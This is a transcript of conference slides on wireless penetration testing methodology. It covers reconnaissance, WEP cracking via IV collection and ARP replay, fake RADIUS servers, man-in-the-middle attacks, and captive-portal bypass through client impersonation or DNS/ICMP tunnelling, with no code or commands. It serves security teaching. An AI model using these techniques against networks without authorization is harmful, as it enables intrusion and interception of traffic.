Wireless Pentesting: It's more than cracking WEP

transcript

Strategic Security, Inc. © http://www.strategicsec.com/

Wireless Penetration Testing is More Than

Cracking WEP

Presented By: Joe McCray

Hmmm......Interesting

Anybody Hungry???

Don’t Worry About Turning Off Your Phones For This

Presentation. I’ll Take Care Of That For You.

Now What Day Did You Say You Checked In?

What If I Want Percocet More Than Every 4

Hours?

I Want To Join The Group Too: The Domain Admin Group.

How Did You Do All Of This?

1. Scope of Wireless Penetration Testing

2. Methodology

3. Tools of the trade

4. Peeling The Onion of a Wireless Network

5. It's all about the data

Agenda

1. Reconnaissance Phase

2. Attack (Penetration Testing) Phase

3. Range Survey Phase

4. Reporting

Methodology

1.Initial Observations

Conducted on foot or in a car, using a handheld device or laptop to gather signal

strength and a listing of available wireless networks

2.Analysis of available networks

Silently gather information about WAPs and clients using each WAP.

- Determine if network is in scope for the assessment

3.Gather Network and AP Information

Gather details for all networks under test.

- Use packet captures to record traffic passing over the network.

Reconnaissance Phase

1.Use data gathered within the recon phase to enumerate priority list of targets.

2.Survey & sniff open access points (if available).

3.Break WEP/WPA encryption if available.

4.Prepare fake RADIUS Server for WPA / managed APs.

5.Launch MiTM attacks.

6.Use other attack patterns as appropriate.

Attack Penetration Testing Phase

1.Survey with typical wireless card, omni-directional antenna, and GPS.

2.Survey with typical wireless card, directional antenna, and GPS.

3.Generate signal maps using gathered data and mapping utility.

Range Survey Phase

Customers tend to implement the following:

1. Configuration parameter ambiguity

2. 802.11 Wireless Authentication

3. 802.11 Wireless Encryption

4. Wireless Network Isolation

5. Wireless Client Isolation

....Just remember that we're on offense? We're pentesters.

Peeling Back The Layers

Configuration Parameter Ambiguity

- SSID Broadcast Disabled

- MAC Address Filtering

Configuration Ambiguity

Wireless Authentication

WEP -- Poorest

Cisco's LEAP -- Poor

WPA-PSK -- Better

WPA-Enterprise -- Best

Wireless Authentication

Wireless Encryption

WEP -- Poorest

WPA (TKIP) -- Better

WPA2 (AES) -- Best

Wireless Encryption

Wireless Network Isolation

Zero Separation -- Poorest

Layer 3 Routed Boundary -- Poor

Firewalled Boundary -- Better

VPN Concentrator -- Best

Wireless Separation

Zero Separation is all too common.

Countless times I see wireless networks that are basically bridged to the LAN.

There is no work required for me to get to the LAN.

Layer 3 Routed Boundry is almost as common.

Your best shot here is using EXTREMELY specific ACLs, and to be honest that

doesn't help much either.

Used commonly in Hotels, Airports, Coffee Shops, etc…

2 Primary bypass methods

- Impersonating an Authorized Wireless Client

- Tunneling Traffic out of the network via DNS, or ICMP

Captive Portal

Firewalled Boundry is much less common.

In my opinion the only thing you really get with this over the routed boundry is

better logging.

VPN Concentrator is even less common, but it's probably your best option if you find

that packet overhead isn't affecting business operations.

This can really slow down your network.

Let's start with the simple stuff....

Simple security mechanisms suck

- SSID Broadcast disabled

- MAC Address Filtering

Wireless Traffic That Reveals Confidential Information

Rouge Access Points

- Employees deploying rogue APs

- Malicious attackers deploying rogue APs

OK – I’m Bored – Let’s Do Some Hacking

WEP was the first encryption standard available for wireless networks. WEP

can be deployed in two strengths, 64 bit and 128 bit. 64-bit WEP consists of a 40-

bit secret key and a 24-bit initialization vector, and is often referred to as 40-bit

WEP. 128-bit WEP similarly employs a 104-bit secret key and a 24-bit initialization

vector and is often called 104-bit WEP.

Association with WEP encrypted networks can be accomplished through the use of

a password, an ASCII key, or a hexadecimal key. WEP’s implementation of the

RC4 algorithm was determined to be flawed, allowing an attacker to crack the key

and compromise WEP encrypted networks.

Attacking Wireless Authentication &

Encryption Mechanisms

- WEP has been dead since 2001

- 2 Primary Methods of attacking WEP

- Collection of weak IVs

After somewhere between 1,500 and 5,000 "weak" IVs are collected,

they can be fed back into the Key Scheduling Algorithm (KSA) and

Pseudo Random Number Generator (PRNG) and the first byte of the key

is revealed. This process is then repeatedfor each byte until the WEP key

is cracked

- Collection of unique IVs

The last byte from the WEP packet is removed, effectively breaking the

Cyclic Redundancy Check/Integrity Check Value (CRC/ICV). If the last

byte was zero, then xor a certain value with the last four bytes of the

packet and the CRC will become valid again. This packet can then be

retransmitted.

WEP IS DEAD!!!!!!!

WEP is dead continued...

The biggest problem with attacks against WEP is that collecting enough

packets. Traffic can be injected into the network, creating more packets.

This is usually accomplished by collecting one or more Address Resolution

Protocol (ARP) packets and retransmitting them to the access point.

ARP packets are a good choice because they have a predictable size (28

bytes).The response will generate traffic and increase the speed that

packets are collected.

WEP IS DEAD!!!!!!!

WPA was developed to replace WEP because of the vulnerabilities associated with it.

WPA can be deployed either using a pre-shared key (WPA-PSK) or in conjunction

with a RADIUS server (WPA-RADIUS). WPA uses either the Temporal Key Integrity

Protocol (TKIP) or the Advanced Encryption Standard (AES) for its encryption

algorithm.

Some vulnerabilities were discovered with certain implementations of WPA-PSK.

Because of this, and to further strengthen the encryption, WPA2 was developed.

The primary difference between WPA and WPA2 is that WPA2 requires the use of

both TKIP and AES, where WPA allowed the user to determine which would be

employed.

What About WPA??

WPA/WPA2 requires the use of an authentication piece in addition to the encryption

piece. A form of the Extensible Authentication Protocol (EAP) is used for this piece.

There are five different EAPs available for use with WPA/WPA2:

- EAP-TLS

- EAP-TTLS/MSCHAPv2

- EAPv0/EAP-MSCHAP2

- EAPv1/EAP-GTC

- EAP-SIM

WPA Continued...

At the end of the day wireless penetration testing is really about verifying

whether or not an attacker can gain access to your production network.

At its core it’s no different than physical security testing. Can you get to the

production network?

At The End Of The Day....It’s All About The Data

If you have other questions you’d like to ask outside of this conference,

or if you want to get a copy of my slides you can contact me at:

Email: joe@strategicsec.com

Twitter: @j0emccray

LinkedIn: http://www.linkedin.com/in/joemccray

Download This Presentation

Wireless Pentesting: It's more than cracking WEP

Technology